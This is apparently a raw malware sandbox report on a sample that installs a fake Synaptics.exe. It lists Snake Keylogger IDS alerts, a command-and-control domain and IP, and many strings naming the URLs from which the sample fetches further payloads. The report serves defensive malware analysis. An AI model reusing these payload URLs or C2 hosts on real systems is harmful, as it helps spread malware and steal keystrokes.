                          Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49796 -> 142.250.181.14:443
                          Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49812 -> 142.250.181.14:443
                          Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49815 -> 142.250.181.14:443
                          Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49822 -> 142.250.181.14:443
                          Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49838 -> 142.250.181.14:443
                          Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49852 -> 142.250.181.14:443
                          Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49797 -> 142.250.181.14:443
                          Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49780 -> 142.250.181.14:443
                          Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49862 -> 142.250.181.14:443
                          Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49861 -> 142.250.181.14:443
                          Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49872 -> 142.250.181.14:443
                          Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49888 -> 142.250.181.14:443
                          Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49807 -> 142.250.181.14:443
                          Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49889 -> 142.250.181.14:443
                          Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49827 -> 142.250.181.14:443
                          Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49764 -> 142.250.181.14:443
                          Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49823 -> 142.250.181.14:443
                          Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49841 -> 142.250.181.14:443
                          Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49843 -> 142.250.181.14:443
                          Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49784 -> 142.250.181.14:443
                          Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49829 -> 142.250.181.14:443
                          Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49876 -> 142.250.181.14:443
                          Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49879 -> 142.250.181.14:443
                          Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49853 -> 142.250.181.14:443
                          Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49839 -> 142.250.181.14:443
                          Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49873 -> 142.250.181.14:443
                          Source: Malware configuration extractor URLs: xred.mooo.com
                          Source: unknown DNS query: name: freedns.afraid.org
                          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 1
                          Source: global traffic TCP traffic: 192.168.2.4:49733 -> 103.36.221.195:8790
                          Source: Joe Sandbox View IP Address: 69.42.215.252 69.42.215.252
                          Source: Joe Sandbox View ASN Name: CHINA169-BJChinaUnicomBeijingProvinceNetworkCN CHINA169-BJChinaUnicomBeijingProvinceNetworkCN
                          Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                          Source: unknown TCP traffic detected without corresponding DNS query: 103.36.221.195
                          Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_1000152B select,memset,recv, 4_2_1000152B
                          Source: global traffic HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
                          Source: global traffic HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
                          Source: global traffic HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                          Source: global traffic HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                          Source: global traffic | HTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                            User-Agent: MyApp
                            Host: freedns.afraid.org
                            Cache-Control: no-cache
                          Source: global traffic | DNS traffic detected: DNS query: docs.google.com
                          Source: global traffic | DNS traffic detected: DNS query: xred.mooo.com
                          Source: global traffic | DNS traffic detected: DNS query: freedns.afraid.org
                          Source: global traffic | DNS traffic detected: DNS query: drive.usercontent.google.com
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                            X-GUploader-UploadID: AFiumC4hScLdnGCuYWqVYuk5Mf1tbrmYb90l-I7PFbRASJwmx8IGzxOKeq15URZwelwNMBtnR3CJgfM
                            Content-Type: text/html; charset=utf-8
                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                            Pragma: no-cache
                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                            Date: Tue, 24 Dec 2024 21:11:13 GMT
                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                            Content-Security-Policy: script-src 'report-sample' 'nonce-8BJ9zOTNVeEpSCIbFV21XA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                            Cross-Origin-Opener-Policy: same-origin
                            Content-Length: 1652
                            Server: UploadServer
                            Set-Cookie: NID=520=OM-dp6bhkhtg79xklAD4xIA-z7FHNk5sgiYtwe9uQU4WfMFr402V9JwNDcq_k6qFgzr7UHEiUo4sL27axlfLKU20pwx-trh7K4VC0SV1oqLt7LhN0lgJgXY86j07HEtnK1kbCobYTpp6nJAQW0XvlryROAv_MUj0QkOxSMMfa_aW60phebG1418L; expires=Wed, 25-Jun-2025 21:11:13 GMT; path=/; domain=.google.com; HttpOnly
                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                            Content-Security-Policy: sandbox allow-scripts
                            Connection: close
                          Source: blq.exe, 00000000.00000003.1660094659.000000000072B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, Synaptics.exe, 00000003.00000002.2938078109.000000000081B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938602891.0000000002080000.00000004.00001000.00020000.00000000.sdmp, RCXAFD2.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.dr | String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                          Source: Synaptics.exe, 00000003.00000002.2938078109.000000000081B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978R
                          Source: Synaptics.exe, 00000003.00000002.2938078109.000000000081B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978~
                          Source: blq.exe, 00000000.00000003.1660094659.000000000072B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, Synaptics.exe, 00000003.00000002.2938602891.0000000002080000.00000004.00001000.00020000.00000000.sdmp, RCXAFD2.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.dr | String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
                          Source: blq.exe, 00000000.00000003.1661544284.0000000002290000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dlp
                          Source: blq.exe, 00000000.00000003.1660094659.000000000072B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, Synaptics.exe, 00000003.00000002.2938602891.0000000002080000.00000004.00001000.00020000.00000000.sdmp, RCXAFD2.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.dr | String found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
                          Source: blq.exe, 00000000.00000003.1661544284.0000000002290000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://xred.site50.net/syn/SUpdate.iniH))
                          Source: blq.exe, 00000000.00000003.1660094659.000000000072B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, Synaptics.exe, 00000003.00000002.2938602891.0000000002080000.00000004.00001000.00020000.00000000.sdmp, RCXAFD2.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.dr | String found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE22000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.000000000082B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE22000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/:
                          Source: Synaptics.exe, 00000003.00000002.2946052719.0000000007707000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/d
                          Source: Synaptics.exe, 00000003.00000002.2946052719.0000000007707000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/l
                          Source: Synaptics.exe, 00000003.00000002.2973653259.000000001553E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2964528186.000000001047E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2956086425.000000000D87E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2976837212.00000000180FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3028509920.000000002B33E000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0;
                          Source: blq.exe, 00000000.00000003.1661544284.0000000002290000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
                          Source: blq.exe, 00000000.00000003.1660094659.000000000072B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, Synaptics.exe, 00000003.00000002.2938602891.0000000002080000.00000004.00001000.00020000.00000000.sdmp, RCXAFD2.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.dr | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
                          Source: blq.exe, 00000000.00000003.1661544284.0000000002290000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo
                          Source: Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2956858218.000000000E27E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3000353585.000000001DF15000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.000000000082B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2994011286.000000001DA97000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2964889949.00000000106FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962865371.000000000F07E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938602891.0000000002080000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2969650789.00000000134BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E73E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2970000995.000000001373E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2961258759.000000000E932000.00000004.00000020.00020000.00000000.sdmp, blq.exe, RCXAFD2.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.dr | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2997458148.000000001DD14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3000353585.000000001DF15000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$
                          Source: Synaptics.exe, 00000003.00000002.2992281499.000000001D9E1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E73E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%
                          Source: Synaptics.exe, 00000003.00000002.2938078109.000000000085C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%xu
                          Source: Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&5
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2997458148.000000001DD14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3000353585.000000001DF15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2992281499.000000001D9E1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2946052719.0000000007707000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2946052719.0000000007707000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-
                          Source: Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-List
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-Mr
                          Source: Synaptics.exe, 00000003.00000002.2992281499.000000001D9E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-b
                          Source: Synaptics.exe, 00000003.00000002.2946052719.000000000776D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-spa
                          Source: Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-uri4
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2992581261.000000001DA4D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.
                          Source: Synaptics.exe, 00000003.00000002.2957759712.000000000E6C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.-.
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download..
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download...
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download..Ss
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.B
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.NU
